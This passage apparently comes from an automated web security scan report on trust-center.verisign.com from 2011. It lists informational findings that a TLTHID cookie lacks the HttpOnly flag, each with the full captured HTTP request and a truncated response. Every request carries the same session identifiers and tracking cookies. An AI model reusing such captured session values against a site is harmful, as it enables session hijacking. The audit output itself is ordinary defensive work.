HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 13169 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.......................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46...[SNIP]...
10.85. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/sm_004276_oo.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/sm_004276_oo.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: Apache Set-Cookie: TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 597 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a . .....Bv...!..NETSCAPE2.0.....!.. ....,.... . ......h.i.X.oU...m. ..!.. ....,...... ......y........2.M.Z..!.. ....,...... .....b.x...bS.. .!.. ....,...... ...........s.M. .!.. ....,...... .......[SNIP]...
10.86. https://trust-center.verisign.com/rcm/verisign/images/truste.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/truste.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/truste.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 2232 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89aD.T..........utt..<q.7...?<<..p..<......'#$La+.........TQR..Tfff........+......+."HEFa.1.................1......BQ'..c333..K..B......" }.&_]]..8................+,...6<%...Up.........3..?..E..0....[SNIP]...
10.87. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermArrow.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermArrow.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 71 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.............!.......,.............i.....0...U......t$b.G..c.%..;
10.88. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermBgM.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermBgM.jpg HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Content-Length: 956 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......JFIF.....H.H.....C............................................ ..................C....... .. .......................................................'......................................[SNIP]...
10.89. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermWtB.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtB.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 978 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a ................................. ............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>...[SNIP]...
10.90. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermWtT.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtT.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 997 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a ................................. ............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>...[SNIP]...
10.91. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermWtT.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtT.jpg HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Content-Length: 876 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......JFIF.....H.H.....C............................................ .....................(............................... ...2......................U..........!"6AGu....123q.........?..Y...x.zWG...[SNIP]...
10.92. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/webtrust.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/webtrust.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 2221 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a..C...................................................................................................z.....f..O..3........3...f..}..3......r .f..ffff.ff.fffKa.3f.3ffWY_2PwCDL33.33f333(0I.3..3f....[SNIP]...
10.93. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/account_signin.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/account_signin.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 741 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function lost_password(formName,referrerPath,username){var form=document.forms[formName];var usernameObj=getElement(username);form.action="/process/retail/account_lost_password?username="+escape(user...[SNIP]...
10.94. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/chat_support.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/chat_support.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: Apache Set-Cookie: TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 423 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function agents_available(onclickLink,imgLink){var sb=document.getElementById('smartbutton');if(sb){sb.innerHTML='<A HREF="" onClick="window.open(\''+onclickLink+'\',\'custclient\',\'width=500,height...[SNIP]...
10.95. https://trust-center.verisign.com/rcm/verisign/scripts/default.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/default.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/default.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 2794 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function initGoogleAnalytics(){_uacct="UA-230424-1";urchinTracker();} function clearButtonSubmits(){if(document.forms){for(var i=0,l=document.forms.length;i<l;i++){if(document.forms[i].button_back){d...[SNIP]...
10.96. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/oo_conf_en-US_inline.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/oo_conf_en-US_inline.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:36 GMT
Server: Apache
Set-Cookie: TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1674
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ /* Create new OnlineOpini...[SNIP]...
10.97. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
Summary
Severity: Information
Confidence: Certain
